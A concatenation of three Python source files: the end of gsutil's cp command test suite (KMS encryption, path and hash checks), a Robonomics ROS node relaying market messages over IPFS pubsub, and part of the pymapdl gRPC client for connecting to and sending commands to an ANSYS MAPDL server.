self.RunGsUtil(['cp', '-s', 'standard', foo_nl_suri, foo_std_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_std_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
def authorize_project_to_use_testing_kms_key(
self, key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME):
# Make sure our keyRing and cryptoKey exist.
keyring_fqn = self.kms_api.CreateKeyRing(
PopulateProjectId(None),
testcase.KmsTestingResources.KEYRING_NAME,
location=testcase.KmsTestingResources.KEYRING_LOCATION)
key_fqn = self.kms_api.CreateCryptoKey(keyring_fqn, key_name)
# Make sure that the service account for our default project is authorized
# to use our test KMS key.
self.RunGsUtil(['kms', 'authorize', '-k', key_fqn], force_gsutil=True)
return key_fqn
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_no_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key_fqn = self.authorize_project_to_use_testing_kms_key()
# Create the unencrypted object, then copy it, specifying a KMS key for the
# new object.
obj_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo')
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(
['cp', suri(obj_uri),
'%s/%s' % (suri(bucket_uri), obj2_name)])
# Make sure the new object is encrypted with the specified KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK('%s/%s' % (suri(bucket_uri), obj2_name),
key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_local_file(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_works_with_resumable_upload(self):
resumable_threshold = 1024 * 1024 # 1M
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * resumable_threshold)
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'resumable_threshold',
str(resumable_threshold))]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_diff_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
key2_fqn = self.authorize_project_to_use_testing_kms_key(
key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME2)
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, specifying a different key to be used.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key2_fqn)]):
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has the different key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj2_suri, key2_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
@SkipForXML('Copying KMS-encrypted objects prohibited with XML API')
def test_kms_key_not_applied_to_nonkms_dst_obj_from_src_with_kms_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, not specifying any KMS key.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has no KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUnencrypted(obj2_suri)
@unittest.skipUnless(
IS_WINDOWS,
'Only Windows paths need to be normalized to use backslashes instead of '
'forward slashes.')
def test_windows_path_with_back_and_forward_slash_is_normalized(self):
# Prior to this test and its corresponding fix, running
# `gsutil cp dir/./file gs://bucket` would result in an object whose name
# was "dir/./file", rather than just "file", as Windows tried to split on
# the path component separator "\" instead of "/".
tmp_dir = self.CreateTempDir()
self.CreateTempFile(tmpdir=tmp_dir, file_name='obj1', contents=b'foo')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '%s\\./obj1' % tmp_dir, suri(bucket_uri)])
# If the destination path was not created correctly, this stat call should
# fail with a non-zero exit code because the specified object won't exist.
self.RunGsUtil(['stat', '%s/obj1' % suri(bucket_uri)])
def test_cp_minus_m_streaming_upload(self):
"""Tests that cp -m - anything is disallowed."""
stderr = self.RunGsUtil(['-m', 'cp', '-', 'file'],
return_stderr=True,
expected_status=1)
self.assertIn(
'CommandException: Cannot upload from a stream when using gsutil -m',
stderr)
@SequentialAndParallelTransfer
def test_cp_overwrites_existing_destination(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(['cp', suri(key_uri), fpath], return_stderr=True)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
@SequentialAndParallelTransfer
def test_downloads_are_reliable_with_more_than_one_gsutil_instance(self):
test_file_count = 10
temporary_directory = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=test_file_count)
cp_args = ['cp', suri(bucket_uri, '*'), temporary_directory]
threads = []
for _ in range(2):
thread = threading.Thread(target=self.RunGsUtil, args=[cp_args])
thread.start()
threads.append(thread)
[t.join() for t in threads]
self.assertEqual(len(os.listdir(temporary_directory)), test_file_count)
class TestCpUnitTests(testcase.GsUtilUnitTestCase):
"""Unit tests for gsutil cp."""
def testDownloadWithNoHashAvailable(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
object_uri.get_key().etag = '12345' # Not an MD5
dst_dir = self.CreateTempDir()
log_handler = self.RunCommand('cp', [suri(object_uri), dst_dir],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEqual(2, len(warning_messages))
self.assertRegex(
warning_messages[0], r'Non-MD5 etag \(12345\) present for key .*, '
r'data integrity checks are not possible')
self.assertIn('Integrity cannot be assured', warning_messages[1])
def testDownloadWithDestinationEndingWithDelimiterRaisesError(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
destination_path = 'random_dir' + os.path.sep
with self.assertRaises(InvalidUrlError) as error:
self.RunCommand('cp', [suri(object_uri), destination_path])
self.assertEqual(str(error.exception), 'Invalid destination path: random_dir' + os.path.sep)
def test_object_and_prefix_same_name(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo/bar',
contents=b'bar')
fpath = self.CreateTempFile()
# MockKey doesn't support hash_algs, so the MD5 will not match.
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
self.RunCommand('cp', [suri(object_uri), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
def test_cp_upload_respects_no_hashes(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
log_handler = self.RunCommand('cp', [fpath, suri(bucket_uri)],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEqual(1, len(warning_messages))
self.assertIn('Found no hashes to validate object upload',
warning_messages[0])
def test_shim_translates_flags(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'use_gcloud_storage', 'True'),
('GSUtil', 'hidden_shim_mode', 'dry_run')]):
with SetEnvironmentForTest({
'CLOUDSDK_CORE_PASS_CREDENTIALS_TO_GSUTIL': 'True',
'CLOUDSDK_ROOT_DIR': 'fake_dir',
}):
mock_log_handler = self.RunCommand(
'cp',
['-r', '-R', '-e', fpath, suri(bucket_uri)],
return_log_handler=True)
info_lines = '\n'.join(mock_log_handler.messages['info'])
self.assertIn(
'Gcloud Storage Command: {} alpha storage cp'
' -r -r --ignore-symlinks {} {}'.format(
os.path.join('fake_dir', 'bin', 'gcloud'), fpath,
suri(bucket_uri)), info_lines)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@mock.patch('os.geteuid', new=mock.Mock(return_value=0))
@mock.patch.object(os, 'chown', autospec=True)
def test_posix_runs_chown_as_super_user(self, mock_chown):
fpath = self.CreateTempFile(contents=b'abcd')
obj = apitools_messages.Object()
obj.metadata = CreateCustomMetadata(entries={UID_ATTR: USER_ID})
ParseAndSetPOSIXAttributes(fpath, obj, False, True)
mock_chown.assert_called_once_with(fpath, USER_ID, -1)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@mock.patch('os.geteuid', new=mock.Mock(return_value=1))
@mock.patch.object(os, 'chown', autospec=True)
def test_posix_skips_chown_when_not_super_user(self, mock_chown):
fpath = self.CreateTempFile(contents=b'abcd')
obj = apitools_messages.Object()
obj.metadata = CreateCustomMetadata(entries={UID_ATTR: USER_ID})
ParseAndSetPOSIXAttributes(fpath, obj, False, True)
mock_chown.assert_not_called()
|
infochan.py
|
# -*- coding: utf-8 -*-
#
# Robonomics information channels support node.
#
from robonomics_lighthouse.msg import Ask, Bid, Result
from binascii import hexlify, unhexlify
from .pubsub import publish, subscribe
from urllib.parse import urlparse
from threading import Thread
import rospy
def bid2dict(b):
return { 'model' : b.model,
'token' : b.token,
'cost' : b.cost,
'count' : b.count,
'lighthouseFee' : b.lighthouseFee,
'salt' : hexlify(b.salt).decode('utf-8'),
'signature': hexlify(b.signature).decode('utf-8'),
'deadline' : b.deadline }
def ask2dict(a):
return { 'model' : a.model,
'objective': a.objective,
'token' : a.token,
'cost' : a.cost,
'count' : a.count,
'validator' : a.validator,
'validatorFee' : a.validatorFee,
'salt' : hexlify(a.salt).decode('utf-8'),
'signature': hexlify(a.signature).decode('utf-8'),
'deadline' : a.deadline }
def res2dict(r):
return { 'liability' : r.liability,
'result' : r.result,
'signature' : hexlify(r.signature).decode('utf-8') }
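# Editor's illustrative sketch (not part of the original node): the serializers
# above hex-encode binary fields (salt, signature) so the dicts stay JSON-safe
# on the IPFS pubsub wire; subscribers reverse the encoding with ``unhexlify``.
def _hex_roundtrip_example():
    """Show the assumed hex round-trip used for binary message fields."""
    salt_bytes = b'\x01\x02'
    wire = hexlify(salt_bytes).decode('utf-8')        # -> '0102'
    assert unhexlify(wire.encode('utf-8')) == salt_bytes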
class InfoChan:
def __init__(self):
'''
Robonomics information channel initialisation.
'''
rospy.init_node('robonomics_infochan')
self.lighthouse = rospy.get_param('~lighthouse_contract')
ipfs_api = urlparse(rospy.get_param('~ipfs_http_provider')).netloc.split(':')
self.ipfs_api = '/ip4/{0}/tcp/{1}'.format(ipfs_api[0], ipfs_api[1])
self.incoming_bid = rospy.Publisher('incoming/bid', Bid, queue_size=10)
self.incoming_ask = rospy.Publisher('incoming/ask', Ask, queue_size=10)
self.incoming_res = rospy.Publisher('incoming/result', Result, queue_size=10)
self.market_chan = '{0}_market'.format(self.lighthouse)
self.result_chan = '{0}_result'.format(self.lighthouse)
rospy.Subscriber('sending/bid', Bid, lambda m: publish(self.ipfs_api, self.market_chan, bid2dict(m)))
rospy.Subscriber('sending/ask', Ask, lambda m: publish(self.ipfs_api, self.market_chan, ask2dict(m)))
rospy.Subscriber('sending/result', Result, lambda m: publish(self.ipfs_api, self.result_chan, res2dict(m)))
def spin(self):
'''
Wait for new incoming messages and republish them to ROS topics.
'''
def market_thread():
for m in subscribe(self.ipfs_api, self.market_chan):
if 'objective' in m:
msg = Ask()
msg.model = m['model']
msg.objective = m['objective']
msg.token = m['token']
msg.cost = m['cost']
msg.count = m['count']
msg.validator = m['validator']
msg.validatorFee = m['validatorFee']
msg.salt = unhexlify(m['salt'].encode('utf-8'))
msg.signature = unhexlify(m['signature'].encode('utf-8'))
msg.deadline = m['deadline']
self.incoming_ask.publish(msg)
else:
msg = Bid()
msg.model = m['model']
msg.token = m['token']
msg.cost = m['cost']
msg.count = m['count']
msg.lighthouseFee = m['lighthouseFee']
msg.salt = unhexlify(m['salt'].encode('utf-8'))
msg.signature = unhexlify(m['signature'].encode('utf-8'))
msg.deadline = m['deadline']
self.incoming_bid.publish(msg)
def result_thread():
for m in subscribe(self.ipfs_api, self.result_chan):
msg = Result()
msg.liability = m['liability']
msg.result = m['result']
msg.signature = unhexlify(m['signature'].encode('utf-8'))
self.incoming_res.publish(msg)
Thread(target=market_thread, daemon=True).start()
Thread(target=result_thread, daemon=True).start()
rospy.spin()
|
mapdl_grpc.py
|
"""gRPC specific class and methods for the MAPDL gRPC client """
import re
from warnings import warn
import shutil
import threading
import weakref
import io
import time
import os
import socket
from functools import wraps
import tempfile
import subprocess
import grpc
import numpy as np
from tqdm import tqdm
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
MSG_IMPORT = """There was a problem importing the ANSYS API module (ansys.api.mapdl).
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl-v0' or 'pip install --upgrade ansys-api-mapdl-v0'
If this does not solve it, please reinstall 'ansys.mapdl.core'
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
MSG_MODULE = """ANSYS API module (ansys.api.mapdl) could not be found.
This might be due to a faulty installation or obsolete API module version.
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl-v0' or 'pip install --upgrade ansys-api-mapdl-v0'
If this does not solve it, please reinstall 'ansys.mapdl.core'.
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
try:
from ansys.api.mapdl.v0 import mapdl_pb2 as pb_types
from ansys.api.mapdl.v0 import mapdl_pb2_grpc as mapdl_grpc
from ansys.api.mapdl.v0 import ansys_kernel_pb2 as anskernel
except ImportError:
raise ImportError(MSG_IMPORT)
except ModuleNotFoundError:
raise ImportError(MSG_MODULE)
from ansys.mapdl.core.mapdl import _MapdlCore
from ansys.mapdl.core.errors import MapdlExitedError, protect_grpc, MapdlRuntimeError
from ansys.mapdl.core.misc import (
supress_logging,
run_as_prep7,
last_created,
random_string,
)
from ansys.mapdl.core.post import PostProcessing
from ansys.mapdl.core.common_grpc import (
parse_chunks,
ANSYS_VALUE_TYPE,
DEFAULT_CHUNKSIZE,
DEFAULT_FILE_CHUNK_SIZE,
)
from ansys.mapdl.core import __version__, _LOCAL_PORTS
from ansys.mapdl.core import check_version
TMP_VAR = '__tmpvar__'
VOID_REQUEST = anskernel.EmptyRequest()
# Default 256 MB message length
MAX_MESSAGE_LENGTH = int(os.environ.get("PYMAPDL_MAX_MESSAGE_LENGTH", 256 * 1024 ** 2))
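# Editor's sketch (an assumption about the wiring, not the client's actual
# code): a cap like MAX_MESSAGE_LENGTH is typically forwarded to the gRPC
# channel options so large result arrays are not rejected by gRPC's default
# 4 MB receive limit. The helper name below is hypothetical.
def _example_channel_with_limits(target, max_len=MAX_MESSAGE_LENGTH):
    """Create an insecure channel that accepts large MAPDL messages (sketch)."""
    return grpc.insecure_channel(
        target,
        options=[
            ("grpc.max_send_message_length", max_len),
            ("grpc.max_receive_message_length", max_len),
        ],
    )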
def chunk_raw(raw, save_as):
with io.BytesIO(raw) as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
return
yield pb_types.UploadFileRequest(
file_name=os.path.basename(save_as),
chunk=anskernel.Chunk(payload=piece, size=length),
)
def get_file_chunks(filename, progress_bar=False):
"""Serializes a file into chunks"""
pbar = None
if progress_bar:
n_bytes = os.path.getsize(filename)
base_name = os.path.basename(filename)
pbar = tqdm(
total=n_bytes,
desc="Uploading %s" % base_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
with open(filename, "rb") as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
if pbar is not None:
pbar.close()
return
if pbar is not None:
pbar.update(length)
chunk = anskernel.Chunk(payload=piece, size=length)
yield pb_types.UploadFileRequest(
file_name=os.path.basename(filename), chunk=chunk
)
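# Editor's note (illustrative only): both generators above yield a stream of
# ``UploadFileRequest`` messages intended for a client-streaming upload RPC;
# consuming one locally is plain iteration, e.g.:
#
#     total = sum(len(req.chunk.payload)
#                 for req in chunk_raw(b"abc" * 1000, "demo.bin"))
#     assert total == 3000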
def save_chunks_to_file(
chunks, filename, progress_bar=True, file_size=None, target_name=""
):
"""Saves chunks to a local file
Returns
-------
file_size : int
File size saved in bytes. ``0`` means no file was written.
"""
pbar = None
if progress_bar:
pbar = tqdm(
total=file_size,
desc="Downloading %s" % target_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
file_size = 0
with open(filename, "wb") as f:
for chunk in chunks:
f.write(chunk.payload)
payload_size = len(chunk.payload)
file_size += payload_size
if pbar is not None:
pbar.update(payload_size)
if pbar is not None:
pbar.close()
return file_size
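# A minimal round-trip sketch of the two helpers above (illustrative only;
# "model.cdb" is a hypothetical local file): joining the payloads of the
# ``UploadFileRequest`` messages yielded by ``get_file_chunks`` reproduces the
# original file contents, which is what the server reassembles on its side.
#
#   requests = get_file_chunks("model.cdb", progress_bar=False)
#   payload = b"".join(req.chunk.payload for req in requests)
#   assert payload == open("model.cdb", "rb").read()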
class RepeatingTimer(threading.Timer):
"""Run a function repeately"""
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
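# Usage sketch (illustrative only): ``RepeatingTimer`` behaves like
# ``threading.Timer`` but keeps re-running the callback every ``interval``
# seconds until ``cancel()`` is called.
#
#   beat = RepeatingTimer(5.0, heartbeat_callback)  # hypothetical callback
#   beat.daemon = True
#   beat.start()
#   ...
#   beat.cancel()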
def check_valid_ip(ip):
"""Check for valid IP address"""
if ip != "localhost":
ip = ip.replace('"', "").replace("'", "")
socket.inet_aton(ip)
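# Behaviour sketch (illustrative only): ``check_valid_ip`` strips quotes and
# defers validation to ``socket.inet_aton``, so "localhost" and any valid
# dotted-quad address pass silently while an invalid one raises ``OSError``.
#
#   check_valid_ip("192.168.1.101")   # OK
#   check_valid_ip("localhost")       # OK, skipped entirely
#   check_valid_ip("999.0.0.1")       # raises OSError (octet out of range)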
class MapdlGrpc(_MapdlCore):
"""This class connects to a GRPC MAPDL server and allows commands
to be passed to a persistent session.
Parameters
----------
ip : str, optional
IP address to connect to the server. Defaults to 'localhost'.
port : int, optional
Port to connect to the mapdl server. Defaults to 50052.
timeout : float
Maximum allowable time to connect to the MAPDL server.
loglevel : str, optional
Sets which messages are printed to the console. Default
        'INFO' prints out all ANSYS messages, 'WARNING' prints only
messages containing ANSYS warnings, and 'ERROR' prints only
error messages.
cleanup_on_exit : bool, optional
Exit MAPDL when Python exits or when this instance is garbage
collected.
set_no_abort : bool, optional
Sets MAPDL to not abort at the first error within /BATCH mode.
Default ``True``.
remove_temp_files : bool, optional
Removes temporary files on exit if MAPDL is local. Default
``False``.
log_file : bool, optional
Copy the log to a file called `logs.log` located where the
python script is executed. Default ``True``.
Examples
--------
    Connect to an instance of MAPDL already running locally on the
default port 50052.
>>> from ansys.mapdl import core as pymapdl
>>> mapdl = pymapdl.Mapdl()
Connect to an instance of MAPDL running on the LAN on a default port
>>> mapdl = pymapdl.Mapdl('192.168.1.101')
Connect to an instance of MAPDL running on the LAN on a non-default port
>>> mapdl = pymapdl.Mapdl('192.168.1.101', port=60001)
"""
    # Required by the `_name` property; these must be defined before `__init__` runs.
_ip = None
_port = None
def __init__(self, ip='127.0.0.1', port=None, timeout=15, loglevel='WARNING',
log_file=False, cleanup_on_exit=False, log_apdl=None,
set_no_abort=True, remove_temp_files=False, **kwargs):
"""Initialize connection to the mapdl server"""
self.__distributed = None
        # port and ip are needed to set up the log
self._port = port
self._ip = ip
super().__init__(
loglevel=loglevel, log_apdl=log_apdl, log_file=log_file, **kwargs
)
check_valid_ip(ip)
        # gRPC request-specific locks, as these gRPC requests are not thread safe
self._vget_lock = False
self._get_lock = False
self._prioritize_thermal = False
self._locked = False # being used within MapdlPool
self._stub = None
self._cleanup = cleanup_on_exit
self._remove_tmp = remove_temp_files
self._jobname = kwargs.pop("jobname", "file")
self._path = kwargs.pop("run_location", None)
self._busy = False # used to check if running a command on the server
self._channel_str = None
self._local = ip in ["127.0.0.1", "127.0.1.1", "localhost"]
if "local" in kwargs: # allow this to be overridden
self._local = kwargs["local"]
self._health_response_queue = None
self._exiting = False
self._exited = None
self._mute = False
if port is None:
from ansys.mapdl.core.launcher import MAPDL_DEFAULT_PORT
port = MAPDL_DEFAULT_PORT
self._server = None
self._channel = None
self._state = None
self._stub = None
self._timeout = timeout
self._pids = []
# try to connect over a series of attempts rather than one
# single one. This prevents a single failed connection from
# blocking other attempts
n_attempts = 5 # consider adding this as a kwarg
connected = False
attempt_timeout = timeout / n_attempts
max_time = time.time() + timeout
i = 0
while time.time() < max_time and i <= n_attempts:
self._log.debug("Connection attempt %d", i + 1)
connected = self._connect(
port, timeout=attempt_timeout, set_no_abort=set_no_abort
)
i += 1
if connected:
self._log.debug("Connected")
break
else:
self._log.debug(f'Reached either maximum amount of connection attempts ({n_attempts}) or timeout ({timeout} s).')
if not connected:
raise IOError(
"Unable to connect to MAPDL gRPC instance at %s" % self._channel_str
)
# double check we have access to the local path if not
# explicitly specified
if "local" not in kwargs:
self._verify_local()
# only cache process IDs if launched locally
if self._local and "exec_file" in kwargs:
self._cache_pids()
def _verify_local(self):
"""Check if Python is local to the MAPDL instance."""
        # Verify that Python has access to the MAPDL directory.
if self._local:
if self._path is None:
directory = self.directory
else:
directory = self._path
if self._jobname is None:
jobname = self.jobname
else:
jobname = self._jobname
lockfile = os.path.join(directory, jobname + ".err")
lockfile0 = os.path.join(directory, jobname + "0.err")
if os.path.isfile(lockfile):
return
if os.path.isfile(lockfile0):
return
self._local = False
@property
def mute(self):
"""Silence the response from all MAPDL functions unless
explicitly set to ``True``.
Returns
-------
bool
Current state of the mute.
Examples
--------
>>> mapdl.mute = True
>>> mapdl.prep7()
''
Temporarily override the instance setting this with
``mute=False``. This is useful for methods that parse the
MAPDL output like ``k``.
>>> mapdl.k('', 1, 1, 1, mute=False)
1
"""
return self._mute
@mute.setter
def mute(self, value):
self._mute = value
def __repr__(self):
info = super().__repr__()
return info
def _connect(self, port, timeout=5, set_no_abort=True, enable_health_check=False):
"""Establish a gRPC channel to a remote or local MAPDL instance.
Parameters
----------
timeout : float
Time in seconds to wait until the connection has been established
"""
self._server = {"ip": self._ip, "port": port}
# open the channel
self._channel_str = "%s:%d" % (self._ip, port)
self._log.debug("Opening insecure channel at %s", self._channel_str)
self._channel = grpc.insecure_channel(
self._channel_str,
options=[
("grpc.max_receive_message_length", MAX_MESSAGE_LENGTH),
],
)
self._state = grpc.channel_ready_future(self._channel)
self._stub = mapdl_grpc.MapdlServiceStub(self._channel)
# verify connection
tstart = time.time()
while ((time.time() - tstart) < timeout) and not self._state._matured:
time.sleep(0.01)
if not self._state._matured: # pragma: no cover
return False
self._log.debug("Established connection to MAPDL gRPC")
# keeps mapdl session alive
self._timer = None
if not self._local:
self._initialised = threading.Event()
self._t_trigger = time.time()
self._t_delay = 30
self._timer = threading.Thread(
target=MapdlGrpc._threaded_heartbeat, args=(weakref.proxy(self),)
)
self._timer.daemon = True
self._timer.start()
# initialize mesh, post processing, and file explorer interfaces
from ansys.mapdl.core.mesh_grpc import MeshGrpc
from ansys.mapdl.core.xpl import ansXpl
self._mesh_rep = MeshGrpc(self)
self._post = PostProcessing(self)
self._xpl = ansXpl(self)
# enable health check
if enable_health_check:
self._enable_health_check()
self.__server_version = None
# HOUSEKEEPING:
# Set to not abort after encountering errors. Otherwise, many
# failures in a row will cause MAPDL to exit without returning
# anything useful. Also avoids abort in batch mode if set.
if set_no_abort:
self._set_no_abort()
return True
@property
def _server_version(self):
"""Return the server version.
Examples
--------
>>> mapdl._server_version
(0, 3, 0)
Uses cached ``__server_version`` to avoid unnecessary communication.
"""
# check cache
if self.__server_version is None:
self.__server_version = self._get_server_version()
return self.__server_version
def _get_server_version(self):
"""Request version from gRPC server.
Generally tied to the release version unless on a development release.
2020R2 --> 0.0.0 (or any unknown version)
2021R1 --> 0.3.0
2021R2 --> 0.4.0
2022R1 --> 0.X.X
"""
sver = (0, 0, 0)
verstr = self._ctrl("VERSION")
if verstr:
sver = check_version.version_tuple(verstr)
return sver
def _enable_health_check(self):
"""Places the status of the health check in _health_response_queue"""
# lazy imports here to speed up module load
from grpc_health.v1 import health_pb2, health_pb2_grpc
def _consume_responses(response_iterator, response_queue):
try:
for response in response_iterator:
response_queue.put(response)
                    # NOTE: we're doing absolutely nothing with this at
# this point since the server side health check
# doesn't change state.
except Exception as err:
if self._exiting:
return
self._exited = True
raise MapdlExitedError("Lost connection with MAPDL server") from None
# enable health check
from queue import Queue
request = health_pb2.HealthCheckRequest()
self._health_stub = health_pb2_grpc.HealthStub(self._channel)
rendezvous = self._health_stub.Watch(request)
# health check feature implemented after 2020R2
try:
status = rendezvous.next()
except Exception as err:
if err.code().name != "UNIMPLEMENTED":
raise err
return
if status.status != health_pb2.HealthCheckResponse.SERVING:
raise MapdlRuntimeError(
"Unable to enable health check and/or connect to" " the MAPDL server"
)
self._health_response_queue = Queue()
# allow main process to exit by setting daemon to true
thread = threading.Thread(
target=_consume_responses,
args=(rendezvous, self._health_response_queue),
daemon=True,
)
thread.start()
def _launch(self, start_parm, timeout=10):
"""Launch a local session of MAPDL in gRPC mode.
This should only need to be used for legacy ``open_gui``
"""
if not self._local:
raise RuntimeError(
"Can only launch the GUI with a local instance of " "MAPDL"
)
from ansys.mapdl.core.launcher import launch_grpc
self._exited = False # reset exit state
port, directory = launch_grpc(**start_parm)
self._connect(port)
# may need to wait for viable connection in open_gui case
tmax = time.time() + timeout
success = False
while time.time() < tmax:
try:
self.prep7()
success = True
break
except:
pass
if not success:
raise RuntimeError("Unable to reconnect to MAPDL")
@property
def post_processing(self):
"""Post-process in an active MAPDL session.
Examples
--------
Get the nodal displacement in the X direction for the first
result set.
>>> mapdl.set(1, 1)
>>> disp_x = mapdl.post_processing.nodal_displacement('X')
array([1.07512979e-04, 8.59137773e-05, 5.70690047e-05, ...,
5.70333124e-05, 8.58600402e-05, 1.07445726e-04])
"""
return self._post
@supress_logging
def _set_no_abort(self):
"""Do not abort MAPDL"""
self.nerr(abort=-1, mute=True)
def _reset_cache(self):
"""Reset cached items"""
self._mesh_rep._reset_cache()
self._geometry._reset_cache()
@property
def _mesh(self):
return self._mesh_rep
def _run(self, cmd, verbose=False, mute=None):
"""Sens a command and return the response as a string.
Parameters
----------
cmd : str
Valid MAPDL command.
verbose : bool, optional
Print the response of a command while it is being run.
mute : bool, optional
Request that no output be sent from the gRPC server.
Defaults to the global setting as specified with
``mapdl.mute = <bool>``. Default ``False``
Examples
--------
Run a basic command.
>>> mapdl.run('/PREP7')
Run a command and suppress its output.
>>> mapdl.run('/PREP7', mute=True)
Run a command and stream its output while it is being run.
>>> mapdl.run('/PREP7', verbose=True)
"""
if mute is None:
mute = self._mute
if self._exited:
raise MapdlExitedError
# don't allow empty commands
if not cmd.strip():
raise ValueError("Empty commands not allowed")
if len(cmd) > 639: # CMD_MAX_LENGTH
raise ValueError("Maximum command length must be less than 640 characters")
self._busy = True
if verbose:
response = self._send_command_stream(cmd, True)
else:
response = self._send_command(cmd, mute=mute)
self._busy = False
return response.strip()
@property
def busy(self):
"""True when MAPDL gRPC server is executing a command"""
return self._busy
@protect_grpc
def _send_command(self, cmd, mute=False):
"""Send a MAPDL command and return the response as a string"""
opt = ""
if mute:
opt = "MUTE" # suppress any output
request = pb_types.CmdRequest(command=cmd, opt=opt)
# TODO: Capture keyboard exception and place this in a thread
grpc_response = self._stub.SendCommand(request)
resp = grpc_response.response
if resp is not None:
return resp.strip()
return None
@protect_grpc
def _send_command_stream(self, cmd, verbose=False):
"""Send a command and expect a streaming response"""
request = pb_types.CmdRequest(command=cmd)
metadata = [("time_step_stream", "100")]
stream = self._stub.SendCommandS(request, metadata=metadata)
response = []
for item in stream:
cmdout = "\n".join(item.cmdout)
if verbose:
print(cmdout)
response.append(cmdout.strip())
return "".join(response)
def _threaded_heartbeat(self):
"""To be called from a thread to verify mapdl instance is alive"""
self._initialised.set()
while True:
if self._exited:
break
try:
time.sleep(self._t_delay)
if not self.is_alive:
break
except ReferenceError:
break
except Exception:
continue
def exit(self, save=False):
"""Exit MAPDL.
Parameters
----------
save : bool, optional
Save the database on exit. Default ``False``.
Examples
--------
>>> mapdl.exit()
"""
if self._exited:
return
self._exiting = True
self._log.debug("Exiting MAPDL")
